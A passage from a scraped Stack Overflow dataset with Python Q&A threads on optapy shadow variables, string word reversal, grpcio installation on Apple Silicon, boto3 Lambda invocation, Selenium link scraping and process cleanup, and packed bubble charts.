sourceTask):\n previous = sourceTask.getPreviousTaskOrEmployee()\n shadowTask = sourceTask\n previousEndTime = None if previous is None else previous.getEndTime()\n startTime = self.calculateStartTime(shadowTask, previousEndTime)\n while shadowTask is not None and shadowTask.getStartTime() != startTime:\n scoreDirector.beforeVariableChanged(shadowTask, \"startTime\")\n shadowTask.setStartTime(startTime)\n scoreDirector.afterVariableChanged(shadowTask, \"startTime\")\n previousEndTime = shadowTask.getEndTime()\n shadowTask = shadowTask.getNextTask()\n startTime = self.calculateStartTime(shadowTask, previousEndTime)\n\n def calculateStartTime(self, task, previousEndTime):\n if task is None or previousEndTime is None:\n return None\n return max(task.getReadyTime(), previousEndTime)\n\nand here how it can be used in a @custom_shadow_variable:\nfrom optapy import planning_entity, planning_variable, custom_shadow_variable, planning_variable_reference\n\n@planning_entity\nclass Task:\n # ...\n @custom_shadow_variable(variable_listener_class = StartTimeUpdatingVariableListener,\n sources=[planning_variable_reference('previousTaskOrEmployee')])\n def get_start_time(self):\n return self.start_time\n \n def set_start_time(self, start_time):\n self.start_time = start_time\n\n"
] | [
1
] | [] | [] | [
"optaplanner",
"optapy",
"python"
] | stackoverflow_0074572053_optaplanner_optapy_python.txt |
Q:
trying to reverse words while maintaining order and print but having trouble figuring out the problem
I have written code that should do as the title says, but I'm getting "TypeError: can only join an iterable"
on line 12, in reverse_words: d.append(''.join(c))
Here is my code:
def reverse_words(text):
#makes 'apple TEST' into ['apple', 'TEST']
a = text.split(' ')
d = []
for i in a:
#takes 'apple' and turns it into ['a','p','p','l','e']
b = i.split()
#takes ['a','p','p','l','e'] and turns it into ['e','l','p','p','a']
c = b.reverse()
#takes ['e','l','p','p','a'] and turns it into 'elppa'
#appends 'elppa' onto d
d.append(''.join(c))
#whole thing repeats for 'TEST' as well
#joins d together by a space and should print out 'elppa TSET'
print(' '.join(d))
reverse_words('apple TEST')
I know it has something to do with how I messed up c, but I cannot identify it.
I am trying to reverse words while maintaining order, but I got a type error.
A:
Perhaps you could consider utilizing str.join on a comprehension that uses list slicing to reverse a string:
def reverse_words(text: str) -> str:
return ' '.join(word[::-1] for word in text.split(' '))
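For example:
print(reverse_words('apple TEST'))  # elppa TSET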
A:
The reverse() method for lists reverses elements in place and doesn't return an iterable - it returns None if the method runs successfully. Also note that i.split() splits on whitespace (giving ['apple'], not ['a','p','p','l','e']), so list(i) is used below to split the word into characters. You can modify your code like this:
def reverse_words(text):
#makes 'apple TEST' into ['apple', 'TEST']
a = text.split(' ')
d = []
for i in a:
#takes 'apple' and turns it into ['a','p','p','l','e']
b = list(i)
#takes ['a','p','p','l','e'] and turns it into ['e','l','p','p','a']
b.reverse()
#takes ['e','l','p','p','a'] and turns it into 'elppa'
#appends 'elppa' onto d
d.append(''.join(b))
#whole thing repeats for 'TEST' as well
#joins d together by a space and should print out 'elppa TSET'
print(' '.join(d))
reverse_words('apple TEST')
You can also use the reversed() method if you want the reversed list in a new variable like so:
def reverse_words(text):
#makes 'apple TEST' into ['apple', 'TEST']
a = text.split(' ')
d = []
for i in a:
#takes 'apple' and turns it into ['a','p','p','l','e']
b = list(i)
#takes ['a','p','p','l','e'] and turns it into ['e','l','p','p','a']
c = reversed(b)
#takes ['e','l','p','p','a'] and turns it into 'elppa'
#appends 'elppa' onto d
d.append(''.join(c))
#whole thing repeats for 'TEST' as well
#joins d together by a space and should print out 'elppa TSET'
print(' '.join(d))
reverse_words('apple TEST')
| trying to reverse words while maintaining order and print but having trouble figuring out the problem | I have written code that should do as the title says but im getting "TypeError: can only join an iterable"
on line 12, in reverse_words d.append(''.join(c))
here is my following code-
def reverse_words(text):
#makes 'apple TEST' into ['apple', 'TEST']
a = text.split(' ')
d = []
for i in a:
#takes 'apple' and turns it into ['a','p','p','l','e']
b = i.split()
#takes ['a','p','p','l','e'] and turns it into ['e','l','p','p','a']
c = b.reverse()
#takes ['e','l','p','p','a'] and turns it into 'elppa'
#appends 'elppa' onto d
d.append(''.join(c))
#whole thing repeats for 'TEST' as well
#joins d together by a space and should print out 'elppa TSET'
print(' '.join(d))
reverse_words('apple TEST')
I know it has to do something that I messed up with c but I cannot identify it.
trying to reverse words while maintaining order but i got a type error
| [
"Perhaps you could consider utilizing str.join on a comprehension that uses list slicing to reverse a string:\ndef reverse_words(text: str) -> str:\n return ' '.join(word[::-1] for word in text.split(' '))\n\n",
"The reverse() method for lists reverses elements in-place and doesn't return an iterable, meaning it will return a none object if the method runs successfully. You can modify your code like this:\ndef reverse_words(text):\n #makes 'apple TEST' into ['apple', 'TEST']\n a = text.split(' ')\n d = []\n for i in a:\n #takes 'apple' and turns it into ['a','p','p','l','e']\n b = i.split()\n #takes ['a','p','p','l','e'] and turns it into ['e','l','p','p','a']\n b.reverse()\n #takes ['e','l','p','p','a'] and turns it into 'elppa'\n #appends 'elppa' onto d\n d.append(''.join(b))\n #whole thing repeats for 'TEST' as well\n #joins d together by a space and should print out 'elppa TSET'\n print(' '.join(d))\n\nreverse_words('apple TEST')\n\nYou can also use the reversed() method if you want the reversed list in a new variable like so:\ndef reverse_words(text):\n #makes 'apple TEST' into ['apple', 'TEST']\n a = text.split(' ')\n d = []\n for i in a:\n #takes 'apple' and turns it into ['a','p','p','l','e']\n b = i.split()\n #takes ['a','p','p','l','e'] and turns it into ['e','l','p','p','a']\n c = reversed(b)\n #takes ['e','l','p','p','a'] and turns it into 'elppa'\n #appends 'elppa' onto d\n d.append(''.join(c))\n #whole thing repeats for 'TEST' as well\n #joins d together by a space and should print out 'elppa TSET'\n print(' '.join(d))\n\nreverse_words('apple TEST')\n\n"
] | [
0,
0
] | [
"d.append('').join(d)\n\nIf this is what you intended try this, otherwise you're gonna need to call a new variable and call .join() on that\n"
] | [
-1
] | [
"python"
] | stackoverflow_0074595185_python.txt |
Q:
Grpcio fails installation for Tensorflow 2.5 on arm64 Apple Silicon
I'm following the instructions here: https://developer.apple.com/metal/tensorflow-plugin/ and having issues installing grpcio. When I try python -m pip install tensorflow-macos I get:
AssertionError: would build wheel with unsupported tag ('cp39', 'cp39', 'macosx_11_0_arm64')
----------------------------------------
ERROR: Failed building wheel for grpcio
The subsequent attempt also ends in an error:
Running setup.py clean for grpcio
Failed to build grpcio
Installing collected packages: grpcio, tensorflow-estimator, keras-nightly, flatbuffers
Attempting uninstall: grpcio
Found existing installation: grpcio 1.38.1
Uninstalling grpcio-1.38.1:
Successfully uninstalled grpcio-1.38.1
Running setup.py install for grpcio ... error
The solutions given here: How can I install GRPCIO on an Apple M1 Silicon laptop? have unfortunately not worked for me.
I am quite inexperienced with architecture/chip challenges, but it reads as though arm64 is currently not supported? If that is the case, it is odd that it is included in the tensorflow_plugin steps. Any thoughts on what I am doing wrong would be appreciated.
A:
What helped me was:
GRPC_PYTHON_BUILD_SYSTEM_OPENSSL=1 GRPC_PYTHON_BUILD_SYSTEM_ZLIB=1 python -m pip install tensorflow-macos
A:
I had to
Build boringssl manually (github answer)
Use the flags while installing grpcio as explained in the previous answer
Upgrade numpy (TypeError StackOverflow)
Install
# The following are required to locally build boringssl
brew install go
brew install wget
brew install cmake
mkdir boringssl
cd boringssl
wget https://boringssl.googlesource.com/boringssl/+archive/master.tar.gz
gunzip -c master.tar.gz | tar xopf -
mkdir build
cd build
cmake ..
make
# Install `grpcio` with the right flags
CFLAGS="-I /opt/homebrew/opt/openssl/include" LDFLAGS="-L /opt/homebrew/opt/openssl/lib" GRPC_PYTHON_BUILD_SYSTEM_OPENSSL=1 GRPC_PYTHON_BUILD_SYSTEM_ZLIB=1 pip install 'grpcio'
pip install tensorflow-macos
# If you see an error like below then upgrade numpy
#
# TypeError: Unable to convert function return value to a Python type! The signature was () -> handle
pip install numpy --upgrade
Test
python -c "import tensorflow as tf; print(tf.reduce_sum(tf.random.normal([1000, 1000])))"
| Grpcio fails installation for Tensorflow 2.5 on arm64 Apple Silicon | I'm following the instructions here: https://developer.apple.com/metal/tensorflow-plugin/ and having issues installing grpcio. When I try python -m pip install tensorflow-macos I get:
AssertionError: would build wheel with unsupported tag ('cp39', 'cp39', 'macosx_11_0_arm64')
----------------------------------------
ERROR: Failed building wheel for grpcio
The subsequent attempt also ends in an error:
Running setup.py clean for grpcio
Failed to build grpcio
Installing collected packages: grpcio, tensorflow-estimator, keras-nightly, flatbuffers
Attempting uninstall: grpcio
Found existing installation: grpcio 1.38.1
Uninstalling grpcio-1.38.1:
Successfully uninstalled grpcio-1.38.1
Running setup.py install for grpcio ... error
The solutions given here: How can I install GRPCIO on an Apple M1 Silicon laptop? have unfortunately not worked to me.
I am quite inexperienced with architecture/chip challenges, but it reads that the arm64 is currently not supported? If that is the case it is odd that it is included in the tensorflow_plugin steps. Any thoughts on what I am doing wrong would be appreciated.
| [
"What helped me was:\nGRPC_PYTHON_BUILD_SYSTEM_OPENSSL=1 GRPC_PYTHON_BUILD_SYSTEM_ZLIB=1 python -m pip install tensorflow-macos\n\n",
"I had to\n\nBuild boringssl manually (github answer)\nUse the flags while installing grpcio as explained in the previous answer\nUpgrade numpy (TypeError StackOverflow)\n\nInstall\n# The following are required to locally build boringssl\nbrew install go\nbrew install wget\nbrew install cmake\nmkdir boringssl\ncd boringssl\nwget https://boringssl.googlesource.com/boringssl/+archive/master.tar.gz\ngunzip -c master.tar.gz | tar xopf -\nmkdir build\ncd build\ncmake ..\nmake\n\n# Install `grpcio` with the right \nYCFLAGS=\"-I /opt/homebrew/opt/openssl/include\" LDFLAGS=\"-L /opt/homebrew/opt/openssl/lib\" GRPC_PYTHON_BUILD_SYSTEM_OPENSSL=1 GRPC_PYTHON_BUILD_SYSTEM_ZLIB=1 pip install 'grpcio'\npip install tensorflow-macos\n\n# If you see an error like below then upgrade numpy\n#\n# TypeError: Unable to convert function return value to a Python type! The signature was () -> handle\npip install numpy --upgrade\n\nTest\npython -c \"import tensorflow as tf; print(tf.reduce_sum(tf.random.normal([1000, 1000])))\"\n\n"
] | [
3,
0
] | [] | [] | [
"apple_m1",
"grpcio",
"python",
"tensorflow"
] | stackoverflow_0069151553_apple_m1_grpcio_python_tensorflow.txt |
Q:
Python AWS Lambda Execution New Update
Update
I changed the params to receive the data directly from a JSON dump to see if that fixed the JSON load issue. Received a new error:
(b'{\n "errorType": "ValidationMetadataException",\n
"errorMessage": "The a' b'rgument is null or empty. Provide an
argument that is not null or empty, and' b' then try the command
again.",\n "stackTrace": [\n "at Amazon.Lambda.P'
b'owerShellHost.PowerShellFunctionHost.ExecuteFunction(Stream
inputStream, ILa' b'mbdaContext context)",\n "at
lambda_method1(Closure , Stream , ILambda' b'Context , Stream )",\n
"at Amazon.Lambda.RuntimeSupport.Bootstrap.User'
b'CodeLoader.Invoke(Stream lambdaData, ILambdaContext lambdaContext,
Stream ou' b'tStream) in
/src/Repo/Libraries/src/Amazon.Lambda.RuntimeSupport/Bootstrap/U'
b'serCodeLoader.cs:line 145",\n "at
Amazon.Lambda.RuntimeSupport.Handler'
b'Wrapper.<>c__DisplayClass8_0.b__0(InvocationRequest
invoc' b'ation) in
/src/Repo/Libraries/src/Amazon.Lambda.RuntimeSupport/Bootstrap/Han'
b'dlerWrapper.cs:line 56",\n "at
Amazon.Lambda.RuntimeSupport.LambdaBoot'
b'strap.InvokeOnceAsync(CancellationToken cancellationToken) in
/src/Repo/Libr'
b'aries/src/Amazon.Lambda.RuntimeSupport/Bootstrap/LambdaBootstrap.cs:line
176' b'"\n ]\n}\n')
Still having no success with passing in the lambda name. The code has been updated from the previous post.
==============================================================
ORIGINAL POST
I am trying to execute a lambda function through python. I can successfully do it when I hardcode the variables but when I substitute the variables in I am unable to process the lambda.
Here is the working sample with hardcoded values:
params = {"value1": "value1-value", "value2": "value2-value", "value3": "value3-value"}
client = boto3.client('lambda')
response = client.invoke(
FunctionName='MyLambdaFunctionName',
InvocationType='RequestResponse',
Payload=json.dumps(params).encode(),
)
pprint.pp(response['Payload'].read())
The part that fails is when I replace params with variables. The plan is to pass them in as call values, but right now I am testing it and setting the values in the function. The variables are listed below:
json_data
lambdaName
lambdaName = os.getenv('TF_VAR_lambdaName')
value1="value1-value"
value2="value2-value"
value3="value3-value"
data = {"value1": "value1-value", "value2": "value2-value", "value3": "value3-value"}
params = json.dumps(data)
client = boto3.client('lambda')
response = client.invoke(
FunctionName=lambdaName,
InvocationType='RequestResponse',
Payload=json.dumps(params).encode(),
)
pprint.pp(response['Payload'].read())
The error I get goes away when I hard-code the JSON or the Lambda Function Name.
The error log I am getting is listed below:
> Traceback (most recent call last): File
> "/Users/go/src/github.com/repo/./cleanup/cleanup.py", line 25, in
> <module>
> response = client.invoke( File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/client.py",
> line 515, in _api_call
> return self._make_api_call(operation_name, kwargs) File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/client.py",
> line 893, in _make_api_call
> request_dict = self._convert_to_request_dict( File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/client.py",
> line 964, in _convert_to_request_dict
> request_dict = self._serializer.serialize_to_request( File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/validate.py",
> line 381, in serialize_to_request
> raise ParamValidationError(report=report.generate_report()) botocore.exceptions.ParamValidationError: Parameter validation failed:
> Invalid type for parameter FunctionName, value: None, type: <class
> 'NoneType'>, valid types: <class 'str'>
A:
I think the problem you have is in the definition of your lambda:
lambdaName = os.getenv('TF_VAR_lambdaName')
Try following:
LAMBDA_NAME = os.environ.get('YOUR_LAMBDA_NAME')  # make sure you put the exact name of your lambda in ''
Then use it in your code:
response = client.invoke(
FunctionName=LAMBDA_NAME,
InvocationType='RequestResponse',
Payload=json.dumps(params).encode()
)
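To catch the missing variable before invoke raises ParamValidationError, a small sketch (the variable name is taken from the question) that fails fast:
import os

LAMBDA_NAME = os.getenv('TF_VAR_lambdaName')
if LAMBDA_NAME is None:
    # surface the real cause instead of a confusing boto3 validation error
    raise RuntimeError("TF_VAR_lambdaName is not set in this shell")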
A:
To the community: thanks for your support here. I finally figured it out with the help of my colleague.
So the first issue:
lambdaName = os.getenv('TF_VAR_lambdaName')
It was odd that this wasn't working, since I had already exported the environment variable using
export TF_VAR_lambdaName="myfunctionname"
I ended up using a print statement to check the value, and it came out as None. Googling a bit, I found a post where someone suggested rerunning the export to set the value again, and that did the trick. I also took a bit from Olga's suggestion and modified the assignment as follows:
LAMBDA_NAME = os.getenv('TF_VAR_lambdaName')
just making the variable all caps to avoid any issues.
Second Issue:
This one turned out to be an easy fix. The short and sweet of it is that I didn't need
json.dumps(data)
The declaration of data was already in the format that params needed. What worked was just setting params equal to data, and Lambda was able to handle it. Final working code below:
#!/usr/bin/env python
import boto3
import json
import pprint
import os
LAMBDA_NAME = os.getenv('TF_VAR_lambdaName')
value1="value1-value"
value2="value2-value"
value3="value3-value"
data = {"value1": value1, "value2": value2 "value3": value3}
params = data
client = boto3.client('lambda')
response = client.invoke(
FunctionName=LAMBDA_NAME,
InvocationType='RequestResponse',
Payload=json.dumps(params).encode(),
)
pprint.pp(response['Payload'].read())
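As a side note on the error in the update: dumping twice produces a JSON string that contains escaped JSON, so the Lambda runtime receives a bare string instead of an object. A quick sketch that shows the difference:
import json

data = {"value1": "value1-value"}
print(json.dumps(data))              # {"value1": "value1-value"}
print(json.dumps(json.dumps(data)))  # "{\"value1\": \"value1-value\"}"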
| Python AWS Lambda Execution New Update | Update
I changed the params to receive the data directly from a JSON dump to see if that fixed the JSON load issue. Received a new error:
(b'{\n "errorType": "ValidationMetadataException",\n
"errorMessage": "The a' b'rgument is null or empty. Provide an
argument that is not null or empty, and' b' then try the command
again.",\n "stackTrace": [\n "at Amazon.Lambda.P'
b'owerShellHost.PowerShellFunctionHost.ExecuteFunction(Stream
inputStream, ILa' b'mbdaContext context)",\n "at
lambda_method1(Closure , Stream , ILambda' b'Context , Stream )",\n
"at Amazon.Lambda.RuntimeSupport.Bootstrap.User'
b'CodeLoader.Invoke(Stream lambdaData, ILambdaContext lambdaContext,
Stream ou' b'tStream) in
/src/Repo/Libraries/src/Amazon.Lambda.RuntimeSupport/Bootstrap/U'
b'serCodeLoader.cs:line 145",\n "at
Amazon.Lambda.RuntimeSupport.Handler'
b'Wrapper.<>c__DisplayClass8_0.b__0(InvocationRequest
invoc' b'ation) in
/src/Repo/Libraries/src/Amazon.Lambda.RuntimeSupport/Bootstrap/Han'
b'dlerWrapper.cs:line 56",\n "at
Amazon.Lambda.RuntimeSupport.LambdaBoot'
b'strap.InvokeOnceAsync(CancellationToken cancellationToken) in
/src/Repo/Libr'
b'aries/src/Amazon.Lambda.RuntimeSupport/Bootstrap/LambdaBootstrap.cs:line
176' b'"\n ]\n}\n')
Still having no success with passing in the lambda name. The code has been updated from the previous post.
==============================================================
ORIGINAL POST
I am trying to execute a lambda function through python. I can successfully do it when I hardcode the variables but when I substitute the variables in I am unable to process the lambda.
Here is the working sample with hardcoded values:
params = {"value1": "value1-value", "value2": "value2-value", "value3": "value3-value"}
client = boto3.client('lambda')
response = client.invoke(
FunctionName='MyLambdaFunctionName',
InvocationType='RequestResponse',
Payload=json.dumps(params).encode(),
)
pprint.pp(response['Payload'].read())
The part that fails is when I replace params with variables. The plan is to pass them in, as I call values but right now, I am testing it and setting the values in the function. The variables are listed below:
json_data |
lambdaName |
lambdaName = os.getenv('TF_VAR_lambdaName')
value1="value1-value"
value2="value2-value"
value3="value3-value"
data = {"value1": "value1-value", "value2": "value2-value", "value3": "value3-value"}
params = json.dumps(data)
client = boto3.client('lambda')
response = client.invoke(
FunctionName=lambdaName,
InvocationType='RequestResponse',
Payload=json.dumps(params).encode(),
)
pprint.pp(response['Payload'].read())
The error I get goes away when I hard-code the JSON or the Lambda Function Name.
The error log I am getting is listed below:
> Traceback (most recent call last): File
> "/Users/go/src/github.com/repo/./cleanup/cleanup.py", line 25, in
> <module>
> response = client.invoke( File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/client.py",
> line 515, in _api_call
> return self._make_api_call(operation_name, kwargs) File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/client.py",
> line 893, in _make_api_call
> request_dict = self._convert_to_request_dict( File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/client.py",
> line 964, in _convert_to_request_dict
> request_dict = self._serializer.serialize_to_request( File "/Users/Library/Python/3.9/lib/python/site-packages/botocore/validate.py",
> line 381, in serialize_to_request
> raise ParamValidationError(report=report.generate_report()) botocore.exceptions.ParamValidationError: Parameter validation failed:
> Invalid type for parameter FunctionName, value: None, type: <class
> 'NoneType'>, valid types: <class 'str'>
| [
"I think the problem you have is in the definition of your lambda:\nlambdaName = os.getenv('TF_VAR_lambdaName')\n\nTry following:\nLAMBDA_NAME = os.environ.get('YOUR_LAMBDA_NAME') // make sure you put the exact name of your lambda in ''\n\nThan use it in your code:\nresponse = client.invoke(\n FunctionName=LAMBDA_NAME,\n InvocationType='RequestResponse',\n Payload=json.dumps(params).encode()\n)\n\n",
"The community, thanks for your support here. I finally figured it out with the help of my colleague.\nSo the first issue:\n\nlambdaName = os.getenv('TF_VAR_lambdaName')\n\nThis was odd that it wasn't working since i had already exported the environment variables using\n\nexport TF_VAR_lambdaName=\"myfunctionname\"\n\nI ended up using a print statement to check the value, and it came out with none. Googling it a bit, found a post where someone suggested rerunning the export to set the value again and that did the trick. I did take a bit from Olgas suggestion and modified the export as follows:\n\nLAMBDA_NAME = os.getenv('TF_VAR_lambdaName')\n\njust making the variable all caps to avoid any issues.\nSecond Issue:\nThis one turned out to be an easy fix. The short in sweet of it is I didn't need\n\njson.dumps(data)\n\nThe declaration of data was already being passed in a format that params needed. What worked was just setting params equal to data and lambda was able to handle it. Final working code below:\n#!/usr/bin/env python\nimport boto3\nimport json\nimport pprint\nimport os \n\nLAMBDA_NAME = os.getenv('TF_VAR_lambdaName')\n value1=\"value1-value\"\n value2=\"value2-value\"\n value3=\"value3-value\"\n \n data = {\"value1\": value1, \"value2\": value2 \"value3\": value3}\n \n params = data\n client = boto3.client('lambda')\n response = client.invoke(\n FunctionName=LAMBDA_NAME,\n InvocationType='RequestResponse',\n Payload=json.dumps(params).encode(),\n )\n pprint.pp(response['Payload'].read())\n\n"
] | [
0,
0
] | [] | [] | [
"amazon_web_services",
"aws_lambda",
"python"
] | stackoverflow_0074596832_amazon_web_services_aws_lambda_python.txt |
Q:
How to Fetch href links in Chromedriver?
I am trying to scrape the link from a button. If I click the button, it opens a new tab and I can't navigate in it. So I thought I'd scrape the link, go to it via webdriver.get(link) and do it that way since this will be a background program. I cannot find any tutorials on this using the most recent version of selenium. This is in Python
I tried using
wd.find_element("xpath", 'xpath here')
but that just scrapes the button title. Is there a different tag I should be using?
I've also tried just clicking the button but that opens a new tab and I don't know how to navigate on it, since it doesn't work by default and I'm still fairly new to Chromedriver.
I can't use beautifulsoup to my knowledge, since the webpage must be logged in.
A:
You need to get the href attribute of the button. If your code gets the right button you can just use
button.get_attribute("href")
Of course if you get redirected using Javascript this is a different story, but since you didn't specify I will assume my answer works
A:
You can use the switch_to function to manage multiple windows (tabs) in the same test case session:
driver.switch_to.window(name_or_handler)
One extra piece of information: if you want to get an attribute value from an element, you can use the get_attribute() function (By.XPATH below is just one possible locator strategy):
link_value = driver.find_element(By.XPATH, selector).get_attribute("href")
P.S: example code written in Python. If you use another language, you can use equivalent Selenium functions for them.
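Putting both answers together, a hedged sketch (the URL and XPath are placeholders, not from the original question) that grabs the href instead of clicking, then navigates in the same tab:
from selenium.webdriver import Chrome
from selenium.webdriver.common.by import By

wd = Chrome()
wd.get("https://example.com")  # placeholder URL

button = wd.find_element(By.XPATH, "//a[@id='my-button']")  # placeholder XPath
link = button.get_attribute("href")
wd.get(link)  # navigate directly, so no new tab opens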
| How to Fetch href links in Chromedriver? | I am trying to scrape the link from a button. If I click the button, it opens a new tab and I can't navigate in it. So I thought I'd scrape the link, go to it via webdriver.get(link) and do it that way since this will be a background program. I cannot find any tutorials on this using the most recent version of selenium. This is in Python
I tried using
wd.find_element("xpath", 'xpath here')
but that just scrapes the button title. Is there a different tag I should be using?
I've also tried just clicking the button but that opens a new tab and I don't know how to navigate on it, since it doesn't work by default and I'm still fairly new to Chromedriver.
I can't use beautifulsoup to my knowledge, since the webpage must be logged in.
| [
"You need to get the href attribute of the button. If your code gets the right button you can just use\nbutton.get_attribute(\"href\")\n\nOf course if you get redirected using Javascript this is a different story, but since you didn't specify I will assume my answer works\n",
"You can use swith_of function to manage multiple windows(tabs) in same test case session\ndriver.switch_to.window(name_or_handler)\n\nAn extra information: If you want to get attribute value from element, you can use get_attribute() function\nlink_value = driver.find_element(By, selector).get_attribute(\"href\")\n\nP.S: example code written in Python. If you use another language, you can use equivalent Selenium functions for them.\n"
] | [
0,
0
] | [] | [] | [
"href",
"python",
"screen_scraping",
"selenium_chromedriver"
] | stackoverflow_0074601928_href_python_screen_scraping_selenium_chromedriver.txt |
Q:
How to kill selenium running as a subprocess?
Given the code below, which runs Selenium as a multiprocessing.Process: despite the process being terminated on macOS Ventura 13.0.1, the Selenium window stays open. Why does the window stay, and how do I force its termination?
from multiprocessing import Process
from selenium.webdriver import Chrome
def func():
driver = Chrome()
driver.get('https://google.com')
if __name__ == '__main__':
p = Process(target=func)
p.daemon = True
p.start()
p.join(timeout=1)
if p.is_alive():
p.terminate()
A current workaround I'm using:
os.system("ps aux | grep Google | awk ' { print $2 } ' | xargs kill -9")
A:
You could do something along these lines:
def func():
driver = Chrome()
driver.get('https://google.com')
driver.quit()
This should close each window after the function concludes.
See Selenium documentation for more info.
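If func can raise, wrapping the body in try/finally (a sketch, not from the original answer) guarantees the browser is closed even on errors:
def func():
    driver = Chrome()
    try:
        driver.get('https://google.com')
    finally:
        driver.quit()  # always runs, even if get() raises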
A:
Assuming you are able to modify the function func, pass the Chrome driver to it as an argument instead of having it create the driver itself.
The main process starts a child process, run_selenium, which starts func in a daemon thread. It then waits for up to 1 second for func to complete.
If the selenium thread (func) is still alive, a call to stop is made on the underlying driver service. run_selenium then terminates, along with its daemon func thread.
from threading import Thread
from multiprocessing import Process
from selenium.webdriver import Chrome
def func(driver):
import time
# Modified to run forever:
while True:
driver.get('https://google.com')
time.sleep(5)
driver.get('https://bing.com')
time.sleep(5)
def run_selenium():
driver = Chrome()
# Selenium will terminate when we do:
t = Thread(target=func, args=(driver,), daemon=True)
t.start()
t.join(1)
# Did selenium actually finish?
if t.is_alive():
driver.service.stop()
if __name__ == '__main__':
p = Process(target=run_selenium)
p.start()
p.join()
print('Selenium terminated; I can now go on to do other things...')
...
| How to kill selenium running as a subprocess? | Given the code below, which runs selenium as a multiprocessing.Process. Despite the process being terminated on macOS Ventura 13.0.1, selenium window stays open. Why does the window stay? how to force its termination?
from multiprocessing import Process
from selenium.webdriver import Chrome
def func():
driver = Chrome()
driver.get('https://google.com')
if __name__ == '__main__':
p = Process(target=func)
p.daemon = True
p.start()
p.join(timeout=1)
if p.is_alive():
p.terminate()
A current workaround I'm using:
os.system("ps aux | grep Google | awk ' { print $2 } ' | xargs kill -9")
| [
"You could do something along these lines:\ndef func():\n driver = Chrome()\n driver.get('https://google.com')\n driver.quit()\n\nThis should close each window, after the function concludes.\nSee Selenium documentation for more info.\n",
"Assuming you are able to modify function func, then pass to it the Chrome driver as an argument instead of it creating the driver itself.\n\nThe main process starts a child process, run_selenium that starts func in a daemon thread. It then waits for up to 1 second for func to complete.\nIf the selenium thread (func) is still alive, a call to stop is made on the underlying driver service. run_selenium then terminates and a long with its daemon func thread.\n\nfrom threading import Thread\nfrom multiprocessing import Process\n\nfrom selenium.webdriver import Chrome\n\n\ndef func(driver):\n import time\n\n # Modified to run forever:\n while True:\n driver.get('https://google.com')\n time.sleep(5)\n driver.get('https://bing.com')\n time.sleep(5)\n\ndef run_selenium():\n driver = Chrome()\n # Selenium will terminate when we do:\n t = Thread(target=func, args=(driver,), daemon=True)\n t.start()\n t.join(1)\n\n # Did selenium actually finish?\n if t.is_alive():\n driver.service.stop()\n\n\nif __name__ == '__main__':\n p = Process(target=run_selenium)\n p.start()\n p.join()\n\n print('Selenium terminated; I can now go on to do other things...')\n ...\n\n"
] | [
0,
0
] | [] | [] | [
"multiprocessing",
"python",
"selenium"
] | stackoverflow_0074580243_multiprocessing_python_selenium.txt |
Q:
packed bubble chart stack in a rectangle with Python
I want to make a packed bubble chart with Python, but stack the bubbles in a rectangle-ish format, something like this:
What is the best way to achieve this? Also is there any Python package that returns the position (coordinate) of bubbles?
A:
Perhaps a treemap chart works for your use case here.
plotly implementation
squarify implementation
A:
Plotly is your friend.
Considering the example dataframe:
d = {'Party': ['Democrat', 'Democrat', 'Republican', 'Republican'], 'Keyword': ['Donkey', 'Left', 'Elephant', 'Right'], 'x': [1, 2, 3, 4], 'y': [1, 1, 3, 4], 'counts': [100, 342, 43, 666]}
df = pd.DataFrame(data=d)
Import plotly.express:
import plotly.express as px
And then use the scatter plot to create your Bubble chart:
fig = px.scatter(df, x="x", y="y",
size='counts', color='Party', text='Keyword', size_max=60)
fig.show()
Note: this answer assumes that you know where to plot your bubbles in the first place (the x and y coordinates in the dataframe).
A:
Matplotlib offers some premade, more niche charts like the one you describe.
You can take a look at the documentation with all these charts here.
So following the documentation, we then define the BubbleChart class as follows:
import numpy as np
import matplotlib.pyplot as plt
class BubbleChart:
def __init__(self, area, bubble_spacing=0):
"""
Setup for bubble collapse.
Parameters
----------
area : array-like
Area of the bubbles.
bubble_spacing : float, default: 0
Minimal spacing between bubbles after collapsing.
Notes
-----
If "area" is sorted, the results might look weird.
"""
area = np.asarray(area)
r = np.sqrt(area / np.pi)
self.bubble_spacing = bubble_spacing
self.bubbles = np.ones((len(area), 4))
self.bubbles[:, 2] = r
self.bubbles[:, 3] = area
self.maxstep = 2 * self.bubbles[:, 2].max() + self.bubble_spacing
self.step_dist = self.maxstep / 2
# calculate initial grid layout for bubbles
length = np.ceil(np.sqrt(len(self.bubbles)))
grid = np.arange(length) * self.maxstep
gx, gy = np.meshgrid(grid, grid)
self.bubbles[:, 0] = gx.flatten()[:len(self.bubbles)]
self.bubbles[:, 1] = gy.flatten()[:len(self.bubbles)]
self.com = self.center_of_mass()
def center_of_mass(self):
return np.average(
self.bubbles[:, :2], axis=0, weights=self.bubbles[:, 3]
)
def center_distance(self, bubble, bubbles):
return np.hypot(bubble[0] - bubbles[:, 0],
bubble[1] - bubbles[:, 1])
def outline_distance(self, bubble, bubbles):
center_distance = self.center_distance(bubble, bubbles)
return center_distance - bubble[2] - \
bubbles[:, 2] - self.bubble_spacing
def check_collisions(self, bubble, bubbles):
distance = self.outline_distance(bubble, bubbles)
return len(distance[distance < 0])
def collides_with(self, bubble, bubbles):
distance = self.outline_distance(bubble, bubbles)
idx_min = np.argmin(distance)
return idx_min if type(idx_min) == np.ndarray else [idx_min]
def collapse(self, n_iterations=50):
"""
Move bubbles to the center of mass.
Parameters
----------
n_iterations : int, default: 50
Number of moves to perform.
"""
for _i in range(n_iterations):
moves = 0
for i in range(len(self.bubbles)):
rest_bub = np.delete(self.bubbles, i, 0)
# try to move directly towards the center of mass
# direction vector from bubble to the center of mass
dir_vec = self.com - self.bubbles[i, :2]
# shorten direction vector to have length of 1
dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))
# calculate new bubble position
new_point = self.bubbles[i, :2] + dir_vec * self.step_dist
new_bubble = np.append(new_point, self.bubbles[i, 2:4])
# check whether new bubble collides with other bubbles
if not self.check_collisions(new_bubble, rest_bub):
self.bubbles[i, :] = new_bubble
self.com = self.center_of_mass()
moves += 1
else:
# try to move around a bubble that you collide with
# find colliding bubble
for colliding in self.collides_with(new_bubble, rest_bub):
# calculate direction vector
dir_vec = rest_bub[colliding, :2] - self.bubbles[i, :2]
dir_vec = dir_vec / np.sqrt(dir_vec.dot(dir_vec))
# calculate orthogonal vector
